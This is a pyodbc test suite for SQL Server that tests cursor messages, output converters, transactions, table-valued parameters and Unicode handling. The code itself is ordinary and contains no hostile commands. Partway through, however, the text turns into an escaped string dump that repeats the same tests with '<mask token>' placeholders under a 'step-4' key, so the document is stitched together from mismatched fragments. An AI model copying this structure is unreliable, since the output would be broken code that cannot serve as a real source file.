Complex scenario to test the Cursor.messages attribute.
"""
cursor.execute("""
create or alter procedure test_cursor_messages as
begin
set nocount on;
print 'Message 1a';
print 'Message 1b';
select N'Field 1a' AS F UNION ALL SELECT N'Field 1b';
select N'Field 2a' AS F UNION ALL SELECT N'Field 2b';
print 'Message 2a';
print 'Message 2b';
end
""")
# The messages will look like:
#
# [Microsoft][ODBC Driver 18 for SQL Server][SQL Server]Message 1a
# result set 1: messages, rows
cursor.execute("exec test_cursor_messages")
vals = [row[0] for row in cursor.fetchall()]
assert vals == ['Field 1a', 'Field 1b']
msgs = [
re.search(r'Message \d[ab]$', m[1]).group(0)
for m in cursor.messages
]
assert msgs == ['Message 1a', 'Message 1b']
# result set 2: rows, no messages
assert cursor.nextset()
vals = [row[0] for row in cursor.fetchall()]
assert vals == ['Field 2a', 'Field 2b']
assert not cursor.messages
# result set 3: messages, no rows
assert cursor.nextset()
with pytest.raises(pyodbc.ProgrammingError):
cursor.fetchall()
msgs = [
re.search(r'Message \d[ab]$', m[1]).group(0)
for m in cursor.messages
]
assert msgs == ['Message 2a', 'Message 2b']
# result set 4: no rows, no messages
assert not cursor.nextset()
with pytest.raises(pyodbc.ProgrammingError):
cursor.fetchall()
assert not cursor.messages
def test_none_param(cursor: pyodbc.Cursor):
"Ensure None can be used for params other than the first"
# Some driver/db versions would fail if NULL was not the first parameter because
# SQLDescribeParam (only used with NULL) could not be used after the first call to
# SQLBindParameter. This means None always worked for the first column, but did not work
# for later columns.
#
# If SQLDescribeParam doesn't work, pyodbc would use VARCHAR which almost always worked.
# However, binary/varbinary won't allow an implicit conversion.
cursor.execute("create table t1(n int, blob varbinary(max))")
cursor.execute("insert into t1 values (1, newid())")
row = cursor.execute("select * from t1").fetchone()
assert row.n == 1
assert isinstance(row.blob, bytes)
sql = "update t1 set n=?, blob=?"
try:
cursor.execute(sql, 2, None)
except pyodbc.DataError:
if IS_FREEDTS:
# cnxn.getinfo(pyodbc.SQL_DESCRIBE_PARAMETER) returns False for FreeTDS, so pyodbc
# can't call SQLDescribeParam to get the correct parameter type. This can lead to
# errors being returned from SQL Server when sp_prepexec is called, e.g., "Implicit
# conversion from data type varchar to varbinary(max) is not allowed."
#
# So at least verify that the user can manually specify the parameter type
cursor.setinputsizes([(), (pyodbc.SQL_VARBINARY, None, None)])
cursor.execute(sql, 2, None)
else:
raise
row = cursor.execute("select * from t1").fetchone()
assert row.n == 2
assert row.blob is None
def test_output_conversion():
def convert1(value):
# The value is the raw bytes (as a bytes object) read from the
        # database.  We'll simply add an X at the beginning and the end.
return 'X' + value.decode('latin1') + 'X'
def convert2(value):
        # Same as above, but add a Y at the beginning and the end.
return 'Y' + value.decode('latin1') + 'Y'
cnxn = connect()
cursor = cnxn.cursor()
cursor.execute("create table t1(n int, v varchar(10))")
cursor.execute("insert into t1 values (1, '123.45')")
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == 'X123.45X'
# Clear all conversions and try again. There should be no Xs this time.
cnxn.clear_output_converters()
value = cursor.execute("select v from t1").fetchone()[0]
assert value == '123.45'
# Same but clear using remove_output_converter.
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == 'X123.45X'
cnxn.remove_output_converter(pyodbc.SQL_VARCHAR)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == '123.45'
# Clear via add_output_converter, passing None for the converter function.
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == 'X123.45X'
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, None)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == '123.45'
# retrieve and temporarily replace converter (get_output_converter)
#
# case_1: converter already registered
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == 'X123.45X'
prev_converter = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)
assert prev_converter is not None
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert2)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == 'Y123.45Y'
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev_converter)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == 'X123.45X'
#
# case_2: no converter already registered
cnxn.clear_output_converters()
value = cursor.execute("select v from t1").fetchone()[0]
assert value == '123.45'
prev_converter = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)
assert prev_converter is None
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert2)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == 'Y123.45Y'
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev_converter)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == '123.45'
def test_too_large(cursor: pyodbc.Cursor):
"""Ensure error raised if insert fails due to truncation"""
value = 'x' * 1000
cursor.execute("create table t1(s varchar(800))")
with pytest.raises(pyodbc.Error):
cursor.execute("insert into t1 values (?)", value)
def test_row_equal(cursor: pyodbc.Cursor):
cursor.execute("create table t1(n int, s varchar(20))")
cursor.execute("insert into t1 values (1, 'test')")
row1 = cursor.execute("select n, s from t1").fetchone()
row2 = cursor.execute("select n, s from t1").fetchone()
assert row1 == row2
def test_row_gtlt(cursor: pyodbc.Cursor):
cursor.execute("create table t1(n int, s varchar(20))")
cursor.execute("insert into t1 values (1, 'test1')")
cursor.execute("insert into t1 values (1, 'test2')")
rows = cursor.execute("select n, s from t1 order by s").fetchall()
assert rows[0] < rows[1]
assert rows[0] <= rows[1]
assert rows[1] > rows[0]
assert rows[1] >= rows[0]
assert rows[0] != rows[1]
rows = list(rows)
rows.sort() # uses <
def test_context_manager_success():
"Ensure `with` commits if an exception is not raised"
cnxn = connect()
cursor = cnxn.cursor()
cursor.execute("create table t1(n int)")
cnxn.commit()
with cnxn:
cursor.execute("insert into t1 values (1)")
rows = cursor.execute("select n from t1").fetchall()
assert len(rows) == 1
assert rows[0][0] == 1
def test_context_manager_failure():
"Ensure `with` rolls back if an exception is raised"
cnxn = connect()
cursor = cnxn.cursor()
# We'll insert a row and commit it. Then we'll insert another row followed by an
# exception.
cursor.execute("create table t1(n int)")
cursor.execute("insert into t1 values (1)")
cnxn.commit()
with pytest.raises(pyodbc.Error):
with cnxn:
cursor.execute("insert into t1 values (2)")
cursor.execute("delete from bogus")
cursor.execute("select max(n) from t1")
val = cursor.fetchval()
assert val == 1
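# Note: pyodbc's connection context manager only commits on success (or rolls back
# on an exception); unlike file objects, it does not close the connection on exit.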
def test_untyped_none(cursor: pyodbc.Cursor):
# From issue 129
value = cursor.execute("select ?", None).fetchone()[0]
assert value is None
def test_large_update_nodata(cursor: pyodbc.Cursor):
cursor.execute('create table t1(a varbinary(max))')
hundredkb = b'x' * 100 * 1024
cursor.execute('update t1 set a=? where 1=0', (hundredkb,))
def test_func_param(cursor: pyodbc.Cursor):
try:
cursor.execute("drop function func1")
    except pyodbc.Error:
pass
cursor.execute("""
create function func1 (@testparam varchar(4))
returns @rettest table (param varchar(4))
as
begin
insert @rettest
select @testparam
return
end
""")
cursor.commit()
value = cursor.execute("select * from func1(?)", 'test').fetchone()[0]
assert value == 'test'
def test_columns(cursor: pyodbc.Cursor):
    # When using aioodbc, `await cursor.primaryKeys('t1')` was raising the error
#
# Error: TypeError: argument 2 must be str, not None
#
# I'm not sure why, but PyArg_ParseTupleAndKeywords fails if you use "|s" for an
# optional string keyword when calling indirectly.
cursor.execute("create table t1(a int, b varchar(3), xΏz varchar(4))")
cursor.columns('t1')
results = {row.column_name: row for row in cursor}
row = results['a']
assert row.type_name == 'int', row.type_name
row = results['b']
assert row.type_name == 'varchar'
assert row.column_size == 3
    # Now do the same, but specifically pass in None to one of the keywords. Old versions
    # were parsing arguments incorrectly and would raise an error. (This crops up when
    # calling indirectly like columns(*args, **kwargs), which aioodbc does.)
cursor.columns('t1', schema=None, catalog=None)
results = {row.column_name: row for row in cursor}
row = results['a']
assert row.type_name == 'int', row.type_name
row = results['b']
assert row.type_name == 'varchar'
assert row.column_size == 3
row = results['xΏz']
assert row.type_name == 'varchar'
assert row.column_size == 4, row.column_size
for i in range(8, 16):
table_name = 'pyodbc_89abcdef'[:i]
cursor.execute(f"""
IF OBJECT_ID (N'{table_name}', N'U') IS NOT NULL DROP TABLE {table_name};
CREATE TABLE {table_name} (id INT PRIMARY KEY);
""")
col_count = len([col.column_name for col in cursor.columns(table_name)])
assert col_count == 1
cursor.execute(f"drop table {table_name}")
def test_cancel(cursor: pyodbc.Cursor):
    # I'm not sure how to reliably cause a hang to cancel, so for now we'll settle for
    # making sure SQLCancel is called correctly.
cursor.execute("select 1")
cursor.cancel()
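# A hedged sketch (not part of the suite): in practice, cancel() is called from a
# second thread to abort a statement that is blocking the first thread. The timings
# and the WAITFOR statement below are illustrative.
def _cancel_from_other_thread_sketch():
    import threading
    cnxn = connect()
    cursor = cnxn.cursor()
    timer = threading.Timer(2.0, cursor.cancel)  # invoke SQLCancel after ~2 seconds
    timer.start()
    try:
        cursor.execute("waitfor delay '00:00:30'")  # a deliberately slow statement
    except pyodbc.Error:
        pass  # the cancelled statement surfaces as an ODBC error
    finally:
        timer.cancel()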
def test_emoticons_as_parameter(cursor: pyodbc.Cursor):
# https://github.com/mkleehammer/pyodbc/issues/423
#
# When sending a varchar parameter, pyodbc is supposed to set ColumnSize to the number
# of characters. Ensure it works even with 4-byte characters.
#
# http://www.fileformat.info/info/unicode/char/1f31c/index.htm
v = "x \U0001F31C z"
cursor.execute("create table t1(s nvarchar(100))")
cursor.execute("insert into t1 values (?)", v)
result = cursor.execute("select s from t1").fetchone()[0]
assert result == v
def test_emoticons_as_literal(cursor: pyodbc.Cursor):
# similar to `test_emoticons_as_parameter`, above, except for Unicode literal
#
# http://www.fileformat.info/info/unicode/char/1f31c/index.htm
# FreeTDS ODBC issue fixed in version 1.1.23
# https://github.com/FreeTDS/freetds/issues/317
v = "x \U0001F31C z"
cursor.execute("create table t1(s nvarchar(100))")
cursor.execute(f"insert into t1 values (N'{v}')")
result = cursor.execute("select s from t1").fetchone()[0]
assert result == v
def _test_tvp(cursor: pyodbc.Cursor, diff_schema):
# Test table value parameters (TVP). I like the explanation here:
#
# https://www.mssqltips.com/sqlservertip/1483/using-table-valued-parameters-tvp-in-sql-server/
#
# "At a high level the TVP allows you to populate a table declared as a T-SQL variable,
# then pass that table as a parameter to a stored procedure or function."
#
# "The TVP must be declared READONLY. You cannot perform any DML (i.e. INSERT, UPDATE,
# DELETE) against the TVP; you can only reference it in a SELECT statement."
#
# In this test we'll create a table, pass it to a stored procedure, and have the stored
# procedure simply return the rows from the TVP.
#
# Apparently the way pyodbc knows something is a TVP is because it is in a sequence. I'm
    # not sure I like that, as the convention is very generic while the feature is specific
    # to SQL Server. It would be wiser to define a wrapper pyodbc.TVP or pyodbc.Table
    # object, similar to the DB API's `Binary` object.
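    # (Concretely: the single TVP parameter below is passed as a list containing a
    # sequence of row tuples, i.e. cursor.execute("exec proc ?", [[row1, row2, ...]]).)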
    # native_uuid=True is the default, but reset it here in case a previous test
    # failed to restore it.
    pyodbc.native_uuid = True
procname = 'SelectTVP'
typename = 'TestTVP'
if diff_schema:
schemaname = 'myschema'
procname = schemaname + '.' + procname
typenameonly = typename
typename = schemaname + '.' + typename
# (Don't use "if exists" since older SQL Servers don't support it.)
    try:
        cursor.execute("drop procedure " + procname)
    except pyodbc.Error:
        pass
    try:
        cursor.execute("drop type " + typename)
    except pyodbc.Error:
        pass
    if diff_schema:
        try:
            cursor.execute("drop schema " + schemaname)
        except pyodbc.Error:
            pass
cursor.commit()
if diff_schema:
cursor.execute("CREATE SCHEMA myschema")
cursor.commit()
cursor.execute(
f"""
CREATE TYPE {typename} AS TABLE(
c01 VARCHAR(255),
c02 VARCHAR(MAX),
c03 VARBINARY(255),
c04 VARBINARY(MAX),
c05 BIT,
c06 DATE,
c07 TIME,
c08 DATETIME2(5),
c09 BIGINT,
c10 FLOAT,
c11 NUMERIC(38, 24),
c12 UNIQUEIDENTIFIER)
""")
cursor.commit()
cursor.execute(
f"""
CREATE PROCEDURE {procname} @TVP {typename} READONLY
AS SELECT * FROM @TVP;
""")
cursor.commit()
# The values aren't exactly VERY_LONG_LEN but close enough and *significantly* faster than
# the loop we had before.
VERY_LONG_LEN = 2000000
long_string = ''.join(chr(i) for i in range(32, 127)) # printable characters
long_bytearray = bytes(list(range(255)))
very_long_string = long_string * (VERY_LONG_LEN // len(long_string))
very_long_bytearray = long_bytearray * (VERY_LONG_LEN // len(long_bytearray))
params = [
# Three rows with all of the types in the table defined above.
(
'abc', 'abc',
bytes([0xD1, 0xCE, 0xFA, 0xCE]),
bytes([0x0F, 0xF1, 0xCE, 0xCA, 0xFE]), True,
date(1997, 8, 29), time(9, 13, 39),
datetime(2018, 11, 13, 13, 33, 26, 298420),
1234567, 3.14, Decimal('31234567890123.141243449787580175325274'),
uuid.UUID('4fe34a93-e574-04cc-200a-353f0d1770b1'),
),
(
'', '',
bytes([0x00, 0x01, 0x02, 0x03, 0x04]),
bytes([0x00, 0x01, 0x02, 0x03, 0x04, 0x05]), False,
date(1, 1, 1), time(0, 0, 0),
datetime(1, 1, 1, 0, 0, 0, 0),
-9223372036854775808, -1.79E+308, Decimal('0.000000000000000000000001'),
uuid.UUID('33f7504c-2bac-1b83-01d1-7434a7ba6a17'),
),
(
long_string, very_long_string,
bytes(long_bytearray), bytes(very_long_bytearray), True,
date(9999, 12, 31), time(23, 59, 59),
datetime(9999, 12, 31, 23, 59, 59, 999990),
9223372036854775807, 1.79E+308, Decimal('99999999999999.999999999999999999999999'),
uuid.UUID('ffffffff-ffff-ffff-ffff-ffffffffffff'),
)
]
if diff_schema:
p1 = [[typenameonly, schemaname] + params]
else:
p1 = [params]
result_array = [tuple(row) for row in cursor.execute(f"exec {procname} ?", p1).fetchall()]
# The values make it very difficult to troubleshoot if something is wrong, so instead of
# asserting they are the same, we'll walk them if there is a problem to identify which is
# wrong.
for row, param in zip(result_array, params):
if row != param:
for r, p in zip(row, param):
assert r == p
# Now test with zero rows.
    params = []
    if diff_schema:
        p1 = [[typenameonly, schemaname] + params]
    else:
        p1 = [params]
result_array = cursor.execute(f"exec {procname} ?", p1).fetchall()
assert result_array == params
@pytest.mark.skipif(IS_FREEDTS, reason='FreeTDS does not support TVP')
def test_tvp(cursor: pyodbc.Cursor):
_test_tvp(cursor, False)
@pytest.mark.skipif(IS_FREEDTS, reason='FreeTDS does not support TVP')
def test_tvp_diffschema(cursor: pyodbc.Cursor):
_test_tvp(cursor, True)
def get_sqlserver_version(cursor: pyodbc.Cursor):
"""
Returns the major version: 8-->2000, 9-->2005, 10-->2008
"""
cursor.execute("exec master..xp_msver 'ProductVersion'")
row = cursor.fetchone()
return int(row.Character_Value.split('.', 1)[0])
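# A hedged sketch of typical usage: gate behavior on the server version at runtime.
# The helper name and threshold below are illustrative, not part of the suite.
def _require_2008_or_later(cursor: pyodbc.Cursor):
    if get_sqlserver_version(cursor) < 10:  # 10 --> SQL Server 2008
        pytest.skip('requires SQL Server 2008 or later')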
@lru_cache()
def _generate_str(length, encoding=None):
"""
Returns either a string or bytes, depending on whether encoding is provided,
that is `length` elements long.
If length is None, None is returned. This simplifies the tests by letting us put None into
an array of other lengths and pass them here, moving the special case check into one place.
"""
if length is None:
return None
# Put non-ASCII characters at the front so we don't end up chopping one in half in a
# multi-byte encoding like UTF-8.
v = 'á'
remaining = max(0, length - len(v))
if remaining:
seed = '0123456789-abcdefghijklmnopqrstuvwxyz-'
if remaining <= len(seed):
v += seed
else:
            # Ceiling division: enough repeats of `seed` to cover the remainder.
            c = (remaining + len(seed) - 1) // len(seed)
v += seed * c
if encoding:
v = v.encode(encoding)
# We chop *after* encoding because if we are encoding then we want bytes.
v = v[:length]
return v
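# Illustrative values (a sketch, not executed by the tests):
#   _generate_str(4)                  -> 'á012'        (a str of 4 characters)
#   _generate_str(4, encoding='utf8') -> b'\xc3\xa101' ('á' is 2 bytes in UTF-8)
#   _generate_str(None)               -> None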
True\n cnxn.autocommit = False\n assert cnxn.autocommit is False\n\n\ndef test_sqlserver_callproc(cursor: pyodbc.Cursor):\n try:\n cursor.execute('drop procedure pyodbctest')\n cursor.commit()\n except:\n pass\n cursor.execute('create table t1(s varchar(10))')\n cursor.execute('insert into t1 values(?)', 'testing')\n cursor.execute(\n \"\"\"\n create procedure pyodbctest @var1 varchar(32)\n as\n begin\n select s from t1\n return\n end\n \"\"\"\n )\n cursor.execute(\"exec pyodbctest 'hi'\")\n\n\ndef test_skip(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(id int)')\n for i in range(1, 5):\n cursor.execute('insert into t1 values(?)', i)\n cursor.execute('select id from t1 order by id')\n assert cursor.fetchone()[0] == 1\n cursor.skip(2)\n assert cursor.fetchone()[0] == 4\n\n\ndef test_timeout():\n cnxn = connect()\n assert cnxn.timeout == 0\n cnxn.timeout = 30\n assert cnxn.timeout == 30\n cnxn.timeout = 0\n assert cnxn.timeout == 0\n\n\ndef test_sets_execute(cursor: pyodbc.Cursor):\n cursor.execute('create table t1 (word varchar (100))')\n words = {'a', 'b', 'c'}\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.execute('insert into t1 (word) values (?)', words)\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.executemany('insert into t1 (word) values (?)', words)\n\n\ndef test_row_execute(cursor: pyodbc.Cursor):\n \"\"\"Ensure we can use a Row object as a parameter to execute\"\"\"\n cursor.execute('create table t1(n int, s varchar(10))')\n cursor.execute(\"insert into t1 values (1, 'a')\")\n row = cursor.execute('select n, s from t1').fetchone()\n assert row\n cursor.execute('create table t2(n int, s varchar(10))')\n cursor.execute('insert into t2 values (?, ?)', row)\n\n\ndef test_row_executemany(cursor: pyodbc.Cursor):\n \"\"\"Ensure we can use a Row object as a parameter to executemany\"\"\"\n cursor.execute('create table t1(n int, s varchar(10))')\n for i in range(3):\n cursor.execute('insert into t1 values (?, ?)', i, chr(ord('a') + i))\n rows = cursor.execute('select n, s from t1').fetchall()\n assert len(rows) != 0\n cursor.execute('create table t2(n int, s varchar(10))')\n cursor.executemany('insert into t2 values (?, ?)', rows)\n\n\ndef test_description(cursor: pyodbc.Cursor):\n \"\"\"Ensure cursor.description is correct\"\"\"\n cursor.execute('create table t1(n int, s varchar(8), d decimal(5,2))')\n cursor.execute(\"insert into t1 values (1, 'abc', '1.23')\")\n cursor.execute('select * from t1')\n t = cursor.description[0]\n assert t[0] == 'n'\n assert t[1] == int\n assert t[5] == 0\n assert t[6] is True\n t = cursor.description[1]\n assert t[0] == 's'\n assert t[1] == str\n assert t[4] == 8\n assert t[5] == 0\n assert t[6] is True\n t = cursor.description[2]\n assert t[0] == 'd'\n assert t[1] == Decimal\n assert t[4] == 5\n assert t[5] == 2\n assert t[6] is True\n\n\n<mask token>\n\n\ndef test_cursor_messages_with_stored_proc(cursor: pyodbc.Cursor):\n \"\"\"\n Complex scenario to test the Cursor.messages attribute.\n \"\"\"\n cursor.execute(\n \"\"\"\n create or alter procedure test_cursor_messages as\n begin\n set nocount on;\n print 'Message 1a';\n print 'Message 1b';\n select N'Field 1a' AS F UNION ALL SELECT N'Field 1b';\n select N'Field 2a' AS F UNION ALL SELECT N'Field 2b';\n print 'Message 2a';\n print 'Message 2b';\n end\n \"\"\"\n )\n cursor.execute('exec test_cursor_messages')\n vals = [row[0] for row in cursor.fetchall()]\n assert vals == ['Field 1a', 'Field 1b']\n msgs = [re.search('Message \\\\d[ab]$', m[1]).group(0) for m in cursor.\n 
messages]\n assert msgs == ['Message 1a', 'Message 1b']\n assert cursor.nextset()\n vals = [row[0] for row in cursor.fetchall()]\n assert vals == ['Field 2a', 'Field 2b']\n assert not cursor.messages\n assert cursor.nextset()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.fetchall()\n msgs = [re.search('Message \\\\d[ab]$', m[1]).group(0) for m in cursor.\n messages]\n assert msgs == ['Message 2a', 'Message 2b']\n assert not cursor.nextset()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.fetchall()\n assert not cursor.messages\n\n\ndef test_none_param(cursor: pyodbc.Cursor):\n \"\"\"Ensure None can be used for params other than the first\"\"\"\n cursor.execute('create table t1(n int, blob varbinary(max))')\n cursor.execute('insert into t1 values (1, newid())')\n row = cursor.execute('select * from t1').fetchone()\n assert row.n == 1\n assert isinstance(row.blob, bytes)\n sql = 'update t1 set n=?, blob=?'\n try:\n cursor.execute(sql, 2, None)\n except pyodbc.DataError:\n if IS_FREEDTS:\n cursor.setinputsizes([(), (pyodbc.SQL_VARBINARY, None, None)])\n cursor.execute(sql, 2, None)\n else:\n raise\n row = cursor.execute('select * from t1').fetchone()\n assert row.n == 2\n assert row.blob is None\n\n\ndef test_output_conversion():\n\n def convert1(value):\n return 'X' + value.decode('latin1') + 'X'\n\n def convert2(value):\n return 'Y' + value.decode('latin1') + 'Y'\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('create table t1(n int, v varchar(10))')\n cursor.execute(\"insert into t1 values (1, '123.45')\")\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.clear_output_converters()\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.remove_output_converter(pyodbc.SQL_VARCHAR)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, None)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n prev_converter = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)\n assert prev_converter is not None\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert2)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'Y123.45Y'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev_converter)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.clear_output_converters()\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n prev_converter = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)\n assert prev_converter is None\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert2)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'Y123.45Y'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev_converter)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n\n\ndef test_too_large(cursor: pyodbc.Cursor):\n \"\"\"Ensure error raised if insert fails due to 
truncation\"\"\"\n value = 'x' * 1000\n cursor.execute('create table t1(s varchar(800))')\n with pytest.raises(pyodbc.Error):\n cursor.execute('insert into t1 values (?)', value)\n\n\n<mask token>\n\n\ndef test_context_manager_success():\n \"\"\"Ensure `with` commits if an exception is not raised\"\"\"\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('create table t1(n int)')\n cnxn.commit()\n with cnxn:\n cursor.execute('insert into t1 values (1)')\n rows = cursor.execute('select n from t1').fetchall()\n assert len(rows) == 1\n assert rows[0][0] == 1\n\n\ndef test_context_manager_failure(cursor: pyodbc.Cursor):\n \"\"\"Ensure `with` rolls back if an exception is raised\"\"\"\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('create table t1(n int)')\n cursor.execute('insert into t1 values (1)')\n cnxn.commit()\n with pytest.raises(pyodbc.Error):\n with cnxn:\n cursor.execute('insert into t1 values (2)')\n cursor.execute('delete from bogus')\n cursor.execute('select max(n) from t1')\n val = cursor.fetchval()\n assert val == 1\n\n\ndef test_untyped_none(cursor: pyodbc.Cursor):\n value = cursor.execute('select ?', None).fetchone()[0]\n assert value is None\n\n\ndef test_large_update_nodata(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a varbinary(max))')\n hundredkb = b'x' * 100 * 1024\n cursor.execute('update t1 set a=? where 1=0', (hundredkb,))\n\n\ndef test_func_param(cursor: pyodbc.Cursor):\n try:\n cursor.execute('drop function func1')\n except:\n pass\n cursor.execute(\n \"\"\"\n create function func1 (@testparam varchar(4))\n returns @rettest table (param varchar(4))\n as\n begin\n insert @rettest\n select @testparam\n return\n end\n \"\"\"\n )\n cursor.commit()\n value = cursor.execute('select * from func1(?)', 'test').fetchone()[0]\n assert value == 'test'\n\n\ndef test_columns(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b varchar(3), xΏz varchar(4))')\n cursor.columns('t1')\n results = {row.column_name: row for row in cursor}\n row = results['a']\n assert row.type_name == 'int', row.type_name\n row = results['b']\n assert row.type_name == 'varchar'\n assert row.column_size == 3\n cursor.columns('t1', schema=None, catalog=None)\n results = {row.column_name: row for row in cursor}\n row = results['a']\n assert row.type_name == 'int', row.type_name\n row = results['b']\n assert row.type_name == 'varchar'\n assert row.column_size == 3\n row = results['xΏz']\n assert row.type_name == 'varchar'\n assert row.column_size == 4, row.column_size\n for i in range(8, 16):\n table_name = 'pyodbc_89abcdef'[:i]\n cursor.execute(\n f\"\"\"\n IF OBJECT_ID (N'{table_name}', N'U') IS NOT NULL DROP TABLE {table_name};\n CREATE TABLE {table_name} (id INT PRIMARY KEY);\n \"\"\"\n )\n col_count = len([col.column_name for col in cursor.columns(table_name)]\n )\n assert col_count == 1\n cursor.execute(f'drop table {table_name}')\n\n\n<mask token>\n\n\ndef test_emoticons_as_parameter(cursor: pyodbc.Cursor):\n v = 'x 🌜 z'\n cursor.execute('create table t1(s nvarchar(100))')\n cursor.execute('insert into t1 values (?)', v)\n result = cursor.execute('select s from t1').fetchone()[0]\n assert result == v\n\n\ndef test_emoticons_as_literal(cursor: pyodbc.Cursor):\n v = 'x 🌜 z'\n cursor.execute('create table t1(s nvarchar(100))')\n cursor.execute(f\"insert into t1 values (N'{v}')\")\n result = cursor.execute('select s from t1').fetchone()[0]\n assert result == v\n\n\n<mask token>\n\n\[email protected](IS_FREEDTS, reason='FreeTDS does not support TVP')\ndef 
test_tvp_diffschema(cursor: pyodbc.Cursor):\n    _test_tvp(cursor, True)\n\n\ndef get_sqlserver_version(cursor: pyodbc.Cursor):\n    \"\"\"\n    Returns the major version: 8-->2000, 9-->2005, 10-->2008\n    \"\"\"\n    cursor.execute(\"exec master..xp_msver 'ProductVersion'\")\n    row = cursor.fetchone()\n    return int(row.Character_Value.split('.', 1)[0])\n\n\n@lru_cache()\ndef _generate_str(length, encoding=None):\n    \"\"\"\n    Returns either a string or bytes, depending on whether encoding is provided,\n    that is `length` elements long.\n\n    If length is None, None is returned. This simplifies the tests by letting us put None into\n    an array of other lengths and pass them here, moving the special case check into one place.\n    \"\"\"\n    if length is None:\n        return None\n    v = 'á'\n    remaining = max(0, length - len(v))\n    if remaining:\n        seed = '0123456789-abcdefghijklmnopqrstuvwxyz-'\n        if remaining <= len(seed):\n            v += seed\n        else:\n            # ceiling division: repeat the seed just enough times to cover `remaining`\n            c = (remaining + len(seed) - 1) // len(seed)\n            v += seed * c\n    if encoding:\n        v = v.encode(encoding)\n    v = v[:length]\n    return v\n",
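The record above exercises pyodbc's output-converter API (add_output_converter, remove_output_converter, get_output_converter, clear_output_converters) in test_output_conversion. A minimal standalone sketch of the save-and-restore pattern that test relies on; the DSN string and the tag() helper are illustrative assumptions, not taken from the dump:

import pyodbc

cnxn = pyodbc.connect('DSN=pyodbc-sqlserver')  # DSN assumed, as in the tests

def tag(value):
    # hypothetical converter: raw bytes from the driver -> decorated str
    return 'X' + value.decode('latin1') + 'X'

prev = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)  # None if nothing installed
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, tag)    # varchar results now pass through tag()
# ... run queries here ...
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev)   # restore; passing None clears the converter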
"step-4": "<mask token>\n\n\ndef connect(autocommit=False, attrs_before=None):\n return pyodbc.connect(CNXNSTR, autocommit=autocommit, attrs_before=\n attrs_before)\n\n\n<mask token>\n\n\[email protected]()\ndef cursor() ->Iterator[pyodbc.Cursor]:\n cnxn = connect()\n cur = cnxn.cursor()\n cur.execute('drop table if exists t1')\n cur.execute('drop table if exists t2')\n cur.execute('drop table if exists t3')\n cnxn.commit()\n yield cur\n if not cnxn.closed:\n cur.close()\n cnxn.close()\n\n\ndef test_text(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'text')\n\n\ndef test_varchar(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'varchar')\n\n\ndef test_nvarchar(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'nvarchar')\n\n\ndef test_varbinary(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'varbinary')\n\n\[email protected](SQLSERVER_YEAR < 2005, reason=\n '(max) not supported until 2005')\ndef test_unicode_longmax(cursor: pyodbc.Cursor):\n cursor.execute(\"select cast(replicate(N'x', 512) as nvarchar(max))\")\n\n\ndef test_char(cursor: pyodbc.Cursor):\n value = 'testing'\n cursor.execute('create table t1(s char(7))')\n cursor.execute('insert into t1 values(?)', 'testing')\n v = cursor.execute('select * from t1').fetchone()[0]\n assert v == value\n\n\ndef test_int(cursor: pyodbc.Cursor):\n _test_scalar(cursor, 'int', 